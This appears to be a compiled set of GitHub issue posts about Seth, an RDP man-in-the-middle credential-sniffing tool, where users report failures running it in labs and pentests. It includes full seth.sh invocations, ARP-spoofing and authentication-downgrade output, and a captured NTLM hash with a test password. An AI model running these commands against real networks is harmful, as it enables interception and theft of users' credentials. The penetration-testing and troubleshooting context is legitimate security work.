syss-research / seth Goto Github PK

Hi all,

I am having an issue getting Seth to work with a RDP connection (see error on the bottom). The server is not enforcing NLA, and the client is configured to using standard RDP security, so that RDP session pops right up and user are prompted user/password inside the RDP session.

The setup is:

• Client RDP config has these settings below which differs from the default RDP profile. The enablecredsspsupport:i:0 setting allows RDP to sessions to first established (no prompt for username/password first). This is done so for the two-factor authentication, where users do not use AD credential to log in but some sort of PIN + Passcode. The authentication level authentication level:i:0 is so it does not do validate or authenticate the server's SSL/TLS certificate, allow it just to connect:

authentication level:i:0
enablecredsspsupport:i:0

• Server does not enforce NLA, running Windows 2018 R2
• The setup currently is all system on the same subnet, including the attacker machine, which runs the latest version of Kali 2018.2.

Video recording: https://vimeo.com/274944143
Seth error message: https://pastebin.com/GHEQumTx
RDP-NoCredSSPSupport-NoServerAuthentication.rdp: https://pastebin.com/DS0NfgnD

When taking out authentication level:i:0 and leaving in enablecredsspsupport:i:0 for the RDP config (video starting minute 1:58), where it has a SSL warning, it will work. If I configured seth.sh to downgrade to level 0 from the default level of 3, it fails with the same error message. Once I add the authentication level:i:0 back in to the RDP config, it fails completely, doesn't matter if seth.sh is set to the default of SETH_DOWNGRADE=3.

I believe this is the authentication level:i:0 config in the RPD profile is breaking Seth, as the default downgrade is level 3, which still requires SSL, so without it, Seth didn't know what to do. However, upon making SETH_DOWNGRADE=0 in seth.sh, the same error still error:

root@kali:~/scripts/Seth# ./seth.sh eth0 172.16.10.{134,50,200}
███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║   [email protected]
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║   https://www.syss.de
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 172.16.10.200
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 172.16.10.50:49509
Downgrading authentication options from 1 to 0
Listening for new connection
Connection lost ([Errno 104] Connection reset by peer)
Connection received from 172.16.10.50:49510
Listening for new connection
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/root/scripts/Seth/seth/main.py", line 47, in run
    self.forward_data()
  File "/root/scripts/Seth/seth/main.py", line 173, in forward_data
    data = tamper_data(data, self.vars, From=From)
  File "/root/scripts/Seth/seth/parsing.py", line 313, in tamper_data
    result = replace_server_cert(bytes, vars["crypto"])
  File "/root/scripts/Seth/seth/parsing.py", line 197, in replace_server_cert
    crypto["pubkey_blob"])
  File "/root/scripts/Seth/seth/crypto.py", line 223, in sign_certificate
    return s.to_bytes(len(crypto["sign"]), "little")
NameError: name 'crypto' is not defined

After "cloning the certification";

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
Unknow Hash Algorithm OID: 
[*] Cleaning up...
[*] Done.

192.168.57.{103,2,102}
What does 103.2.102 in brackets mean?Is this 2.102 different for every machine? Thank you!
root@kali:/Seth-master# ./seth.sh eth1 192.168.132.{133,2,102} calc
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[!] Something went wrong while parsing the output of tcpdump
[] Cleaning up...
[] Done.
root@kali:/Seth-master#

When I try to intercept RDP locally with my KALI LINUX VM having IP 192.168.11.40 & my victim (local PC) 192.168.11.64 I fail to get any SYN packet if I use the public IP of my RDP test server.

My command looks like ./seth.sh eth0 192.168.11.40 192.168.11.40 150.5.5.5
the public ip is not real in this case of course.

The script stays idle at the step [*] Waiting for a SYN packet to the original destination...

If i force RDP connection on my local PC (victim), i see nothing 'moving' in the script window.

Is this because public IP's are not supported as host IP's in the script?

Hello friends,

i used Seth to test our corporate network for this RDP-flaw.
It's strange, because it worked fine, when i used Seth from my homeoffice (different network as my corporate network, but VPN connection)
The command: sudo ./seth.sh eth0 IP_ATTACKER IP_VICTIM IP_GATEWAY worked well, espacially when the victim connects to an RDP-server using the hostname at the Windows 10 RDP-window.

Today I'm sitting in the office, connected to the corporate LAN. I'm using the same equipment and no changes were made (attacker is a fresh Kali Linux VM. No changes were made).
The command: sudo ./seth.sh eth0 IP_ATTACKER IP_VICTIM IP_RDP-SERVER isn't working well. When I connect to the RDP-server from the victim machine using the hostname, I get the error 'TLS alert internal error received, make sure to use RC4-SHA.' When I'm using the IP address to connect to the RDP-server, the attack works well. But this is not good for demonstration because (in my opinion) no user uses the IP address to connect to a server in real life....

I would be grateful for some advice

Server Windows 10 10 10.0.14393 Certificate TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384:
Debug Log (Windows 10 Client 10.0.10586 rdp 10.0) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/pGPMxemG

[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is X.X.X.X
[] Clone the x509 certificate of the original destination...
[] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.111.129:1044
Listening for new connection
Enable SSL
Not using RC4-SHA because of SSL Error: ('No cipher can be selected.',)
Connection received from 192.168.111.129:1045
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Not using RC4-SHA because of SSL Error: ('No cipher can be selected.',)
Connection lost
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/taylor/Seth/seth/main.py", line 42, in run
self.run_fake_server()
File "/taylor/Seth/seth/main.py", line 87, in run_fake_server
(id, id)))
File "/usr/lib/python3.6/ssl.py", line 941, in send
return self._sslobj.write(data)
File "/usr/lib/python3.6/ssl.py", line 642, in write
return self._sslobj.write(data)
BrokenPipeError: [Errno 32] Broken pipe

Connection received from 192.168.1.14
Enable SSL
Traceback (most recent call last):
File "/root/GitHub/Seth/rdp-cred-sniffer.py", line 821, in
run()
File "/root/GitHub/Seth/rdp-cred-sniffer.py", line 803, in run
enableSSL()
File "/root/GitHub/Seth/rdp-cred-sniffer.py", line 729, in enableSSL
certfile=args.certfile,
File "/usr/lib/python3.5/ssl.py", line 1077, in wrap_socket
ciphers=ciphers)
File "/usr/lib/python3.5/ssl.py", line 760, in init
self.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 996, in do_handshake
self._sslobj.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 641, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: VERSION_TOO_LOW] version too low (_ssl.c:719)
[] Cleaning up...
[] Done.
root@lgcambero:~/GitHub/Seth# openssl version
OpenSSL 1.1.0f 25 May 2017

Any idea? Tks.

Hi, I'm encountering an error when trying to connect to the RDP proxy:

./seth.sh ens192 10.3.201.10 10.3.201.50 10.3.201.20

[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 10.3.201.20
[] Clone the x509 certificate of the original destination...
[] Adjust the iptables rule for all packets...
[*] Run RDP proxy...

Listening for new connection
Connection received from 10.3.201.50:22750
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib64/python3.4/threading.py", line 911, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 171, in forward_data
self.save_vars(parse_rdp(data, self.vars, From=From))
File "/opt/Seth/seth/parsing.py", line 226, in parse_rdp
result.update(parse_rdp_packet(bytes[:length+pad], vars, From=From))
File "/opt/Seth/seth/parsing.py", line 258, in parse_rdp_packet
regex = b".*%s0002000000" % hexlify(b"NTLMSSP")
TypeError: unsupported operand type(s) for %: 'bytes' and 'bytes'

Connection received from 10.3.201.50:22751
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib64/python3.4/threading.py", line 911, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 171, in forward_data
self.save_vars(parse_rdp(data, self.vars, From=From))
File "/opt/Seth/seth/parsing.py", line 226, in parse_rdp
result.update(parse_rdp_packet(bytes[:length+pad], vars, From=From))
File "/opt/Seth/seth/parsing.py", line 258, in parse_rdp_packet
regex = b".*%s0002000000" % hexlify(b"NTLMSSP")
TypeError: unsupported operand type(s) for %: 'bytes' and 'bytes'

The real host is Windows Server 2012 R2

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#Seth

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

• Open source: Every information is available and up to date. If an information is missing or deprecated, you are invited to (help us).
• Practical: Content is categorized and table formatted, allowing to search, browse, sort and filter.
• Fast: Using static and client side technologies resulting in fast browsing.
• Rich tables: search, sort, browse, filter, clear
• Fancy informational popups
• Badges / Shields
• Static API
• Twitter bot

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why?

• Specialized websites: Some websites are referencing tools but additional information is not available or browsable. Make additional searches take time.
• Curated lists: Curated lists are not very exhaustive, up to date or browsable and are very topic related.
• Search engines: Search engines sometimes does find nothing, some tools or resources are too unknown or non-referenced. These is where crowdsourcing is better than robots.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.

Badges

The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make the project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care.

Hello, I am trying to use this tool in my corporate Network. Obviously, my Attacker/Victim/Host IPs are different. I tried to provide all the IPs but no success. Wondering how can I use this tools with different subnets. Also, how come hacker know that specific IP is going to use that particular host.

Thanks for your help and great work.

Regards.

After upgrading to the latest version, now when running seth all i get is this:

[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...

The all three systems, mine, the victim and the target are all on the same subnet. So why is it just sitting there looking pretty and not doing anything?

Hi,

I have a windows 7 machine which is running RDP for all versions (not NLA enabled) on 192.168.57.202. I am trying to connect from a Windows 10 machine to the Windows 7 host 192.168.57.202, but I am encountering the error below. Is it possible to advise what could be the issue here with the unsupported protocol error message? I thought that i have out-of-date packages and have checked my device time too - they are up-to-date and accurate respectively.

# python3 --version
Python 3.7.2+

Command that I ran with output:

# ./seth.sh eth1 192.168.57.4 192.168.57.203 192.168.57.202
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.202
[*] Clone the x509 certificate of the original destination...
unable to load certificate
140462790321216:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.203:50475
Warning: RC4 not available on client, attack might not work
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/opt/Seth/seth/main.py", line 46, in run
    self.enableSSL()
  File "/opt/Seth/seth/main.py", line 150, in enableSSL
    self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
  File "/usr/lib/python3.6/ssl.py", line 1158, in wrap_socket
    ciphers=ciphers)
  File "/usr/lib/python3.6/ssl.py", line 817, in __init__
    self.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 1077, in do_handshake
    self._sslobj.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake
    self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:852)

Connection received from 192.168.57.203:50482
Warning: RC4 not available on client, attack might not work
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/opt/Seth/seth/main.py", line 46, in run
    self.enableSSL()
  File "/opt/Seth/seth/main.py", line 150, in enableSSL
    self.rsock = ssl.wrap_socket(self.rsock, ciphers=None)
  File "/usr/lib/python3.6/ssl.py", line 1158, in wrap_socket
    ciphers=ciphers)
  File "/usr/lib/python3.6/ssl.py", line 817, in __init__
    self.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 1077, in do_handshake
    self._sslobj.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake
    self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:852)

"No module named 'hexdump'" error despite module installation.

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Traceback (most recent call last):
  File "/home/user/Desktop/Seth-master/rdp-cred-sniffer.py", line 18, in <module>
    import hexdump
ImportError: No module named 'hexdump'
[*] Cleaning up...
[*] Done.

[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 1xx.xx.xx.xxx
[] Clone the x509 certificate of the original destination...
[] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 1xx.xx.xx.xxx:18885
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 155, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)
Connection received from 1xx.xx.xx.xxx:18887
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 155, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)

Any idea what it may be?
Thanks

When trying to mitm the connection i get the following on Ubuntu.

Traceback (most recent call last):
File "/tmp/Seth-master/rdp-cred-sniffer.py", line 818, in
local_socket.listen()
TypeError: listen() takes exactly one argument (0 given)

Any ideas?
All requirements are met.
The same works on kali linux but not on Ubuntu....

Hi,
in some cases I receive an error, but the attack functions:

Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection received from myPCasVictim:64766
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Seth/seth/main.py", line 49, in run
self.run_fake_server()
File "/root/Seth/seth/main.py", line 100, in run_fake_server
(id, id)))
File "/usr/lib/python3.7/ssl.py", line 1003, in send
return self._sslobj.write(data)
BrokenPipeError: [Errno 32] Broken pipe

I have no effort by changing MinProtocol from TLSv1.2 to TLSv1.0

Server Windows 2012 R2 6.3.9600 TLSv1.2 + ECDHE-RSA-AES256-SHA384:
Debug Log (Client Windows 7 / 10 Login: Administrator / admin-123456) -> https://pastebin.com/Ar8Lb8pK

and

Debug Log (Windows 7 Client 6.3.9600 rdp 8.1) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/A9RNLEKx

Why I just print listening for new connection?
I cannot get other things.

I use ubuntu 18.04
my target is windows 10 64bit
when I run the script by the following command I got those errors:
#./seth.sh eth1 192.168.10.{59,57,10} calc

███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Linux OS detected, using iptables as the netfilter interpreter
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.10.10
[] Clone the x509 certificate of the original destination...
[] Adjust iptables rules for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from 192.168.10.57:49802
Warning: RC4 not available on client, attack might not work
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
test::DESKTOP-V50VN9K:b6f9cc86441228f9:bea6860fecda0cd86cd5b23b4216b602:010100000000000022972acf6b8ad60193e25ae7f86e77d20000000002001e00570049004e002d003700370032004400320052003600470033005300370001001e00570049004e002d003700370032004400320052003600470033005300370004001e00570049004e002d003700370032004400320052003600470033005300370003001e00570049004e002d00370037003200440032005200360047003300530037000700080022972acf6b8ad601060004000200000008003000300000000000000001000000002000002ebd4ef70e6bb9b6b73d66d1da7808e5aba82dc2bcb98547d30c8db0de025fdc0a0010000000000000000000000000000000000009002a005400450052004d005300520056002f003100390032002e003100360038002e00310030002e0031003000000000000000000000000000
Tamper with NTLM response
Downgrading CredSSP
Connection lost ([Errno 104] Connection reset by peer)
Connection received from 192.168.10.57:49809
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Connection lost on run_fake_server
Connection received from 192.168.10.57:49810
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
'NoneType' object has no attribute 'getsockopt'
Hiding forged protocol request from client
.\test:test123
[] Cleaning up...
[] Done

File "seth.sh", line 4
SyntaxError: Non-ASCII character '\xe2' in file seth.sh on line 4, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details

Tested on Kali Linux and Debian 8.7.x.

I have tired running the tool recently in an AD environment. ARP spoofing was successful and routed the traffic to my Kali Linux VM. However, after the victim tried to enter the credential, the RDP then returned error message " The Connection Has Been Terminated Because An Unexpected Server Authentication Certificate Was Received From The Remote Computer" and dropped the connection. Any idea to fix this issue?

Here is the output of seth.sh:
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 10.0.0.87
[] Clone the x509 certificate of the original destination...
[] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 10.0.0.164:57782
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
Connection lost

[*] Clone the x509 certificate of the original destination...
unable to load certificate
139899288974528:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...

unable to load certificate
140110513026240:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[] Adjust iptables rules for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from 192.168.1.185:35364
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Connection received from 192.168.1.185:35366
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.7/ssl.py", line 423, in wrap_socket
session=session
File "/usr/lib/python3.7/ssl.py", line 870, in _create
self.do_handshake()
File "/usr/lib/python3.7/ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1076)

Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.7/ssl.py", line 423, in wrap_socket
session=session
File "/usr/lib/python3.7/ssl.py", line 870, in _create
self.do_handshake()
File "/usr/lib/python3.7/ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1076)

Connection received from 192.168.1.185:35368
Warning: RC4 not available on client, attack might not work
Listening for new connection
nable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/root/Desktop/rdp_redteaming/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.7/ssl.py", line 423, in wrap_socket
session=session
File "/usr/lib/python3.7/ssl.py", line 870, in _create
self.do_handshake()
File "/usr/lib/python3.7/ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1076)

Connection received from 192.168.1.185:35368
Warning: RC4 not available on client, attack might not work
Listening for new connection

Seth could be enhanced to perform an SMB relay attack, possibly by using impacket's ntlmrelayx.py.

I want to know how to run seth in windows.

the rdp connection get stuck and seth doesn't capture anything

The error occurs when the "victim" (<VICTIM_IP>) want connect to the RDP enabled server;

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
unable to load certificate
139716702381736:error:0906D06C:PEM routines:PEM_read_bio:no start line:pem_lib.c:703:Expecting: TRUSTED CERTIFICATE
unable to load certificate
140000985458344:error:0906D06C:PEM routines:PEM_read_bio:no start line:pem_lib.c:703:Expecting: TRUSTED CERTIFICATE
[*] Cleaning up...
[*] Done.

This could be leveraged to gain RCE on the client: https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/

Good Morning,
I'm testing with Seth connections with several devices, that offer rdp. It seems to be, that the fake certificate has a failure, if the original has a complicated structure. My Remote Desktop APP of Windows 10 closes the connection with the message of an unexpected certificate of the rdp-service.

I insert a copy instruction in the procdure seth.sh, after the generating step of the fake cert:

CERTPATH="$(printf "%s" "$CERT_KEY" | tail -n1)"

cp "$CERTPATH" fake.cert

If I verify the fake cert, openssl has problems with the padding's in the cert:

error 7 at 0 depth lookup: certificate signature failure
error fake.cert: verification failed
140477724615872:error:0407008A:rsa routines:RSA_padding_check_PKCS1_type_1:invalid padding:../crypto/rsa/rsa_pk1.c:66:
140477724615872:error:04067072:rsa routines:rsa_ossl_public_decrypt:padding check failed:../crypto/rsa/rsa_ossl.c:588:
140477724615872:error:0D0C5006:asn1 encoding routines:ASN1_item_verify:EVP lib:../crypto/asn1/a_verify.c:170:

In the cases, when I can set me in the middle, the verify is without any failure:

openssl verify fake.cert
CN = *****************
error 20 at 0 depth lookup: unable to get local issuer certificate
error fake.cert: verification failed

Bye Rose

192.168.57.{103,2,102}
The instructions are confusing, indicating that they are completely incomprehensible.

Enable SSL
Connection received from
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
self.run()
File "/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.5/ssl.py", line 385, in wrap_socket
_context=self)
File "/usr/lib/python3.5/ssl.py", line 760, in init
self.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 996, in do_handshake
self._sslobj.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 641, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:719)

Listening for new connection
Enable SSL
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
self.run()
File "/Seth/seth/main.py", line 46, in run
self.enableSSL()
File "/Seth/seth/main.py", line 161, in enableSSL
do_handshake_on_connect=True,
File "/usr/lib/python3.5/ssl.py", line 385, in wrap_socket
_context=self)
File "/usr/lib/python3.5/ssl.py", line 760, in init
self.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 996, in do_handshake
self._sslobj.do_handshake()
File "/usr/lib/python3.5/ssl.py", line 641, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:719)

^C[] Cleaning up...
[] Done

Openssl Version:

OpenSSL 1.0.1 14 Mar 2012 (Library: OpenSSL 1.0.1t 3 May 2016)

Python Version:
python -c "import ssl; print ssl.OPENSSL_VERSION"
OpenSSL 1.1.0f 25 May 2017

Testing on windows 7 rdp, rc4 enabled, and NLA disabled.

Hey there, recently tested the script in a lab between two unpatched Windows 10 boxes. Here's the setup:

Seth Server at 192.168.234.141
RDP Server at 192.168.234.128
Connecting Victim at 192.168.234.130

Without Seth running, the certificate warning should look as follows:

However, when I run Seth by:

root@kali:~/Seth# ./seth.sh eth0 192.168.234.141 192.168.234.130 192.168.234.128

Then connect from the victim machine again, I see the following certificate error presented by Seth's fake cert:

Is there something that I'm missing in running this script, or something that's changed in Windows 10?

I'm using Seth for a pentest I'm doing and I'm getting an error similar to what was reported in #1. But I wonder if the RDP server (xrdp running on CentOS) is causing the problem. In my case there is no MS Windows; every host is running Linux:

$ cat /etc/hosts
192.168.0.1     router
192.168.0.16    victim
192.168.0.33    attacker
██.██.██.205   rdp-server

Attacker Output

$ sudo SETH_DEBUG=1 ./seth.sh eth0 192.168.0.33 192.168.0.16 192.168.0.1
...
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is ██.██.██.205
[*] Clone the x509 certificate of the original destination...
unable to load certificate
140347480601664:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection

The Original XRDP Certificate

I used Wireshark to extract the raw bytes of the certificate that is being served by the RDP server. It looks OK to me. But it is causing the above error.

$ openssl x509 -inform DER -in ../Pentests/███████████████.com/Files/rdpcert.der -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            b0:1f:99:b5:7e:8f:05:cd
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = XRDP
        Validity
            Not Before: Feb  1 00:37:16 2019 GMT
            Not After : Jan 31 00:37:16 2029 GMT
        Subject: CN = XRDP
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:d2:50:65:e0:bb:87:1e:a6:ab:66:c3:bb:52:03:
                    f5:f8:78:a4:4c:f8:03:7c:7d:90:c9:6a:e8:11:5f:
                    93:96:f1:7b:33:11:36:e1:f5:1c:b3:0c:02:59:34:
                    4a:70:2a:49:39:11:90:1e:7c:f9:fb:7e:ea:1b:5e:
                    40:03:da:c3:9f:9d:5e:63:8c:79:f9:b5:e5:4e:85:
                    7d:7d:4b:b2:ce:9d:ab:bc:92:f5:61:4a:0a:09:d7:
                    47:2a:12:8d:e4:16:3e:96:bb:51:e3:59:c0:db:88:
                    ad:f3:dd:20:f2:a3:94:52:93:97:19:ec:91:06:85:
                    7c:d9:eb:12:ee:01:19:c2:57:b9:44:e1:26:4d:02:
                    0f:f0:2f:21:2f:05:43:01:f1:8e:6c:4f:54:20:9d:
                    cf:7f:85:7d:55:43:4d:a6:36:aa:5f:2c:6a:0a:77:
                    08:da:2b:be:96:6a:54:8d:03:94:7a:10:f2:87:2c:
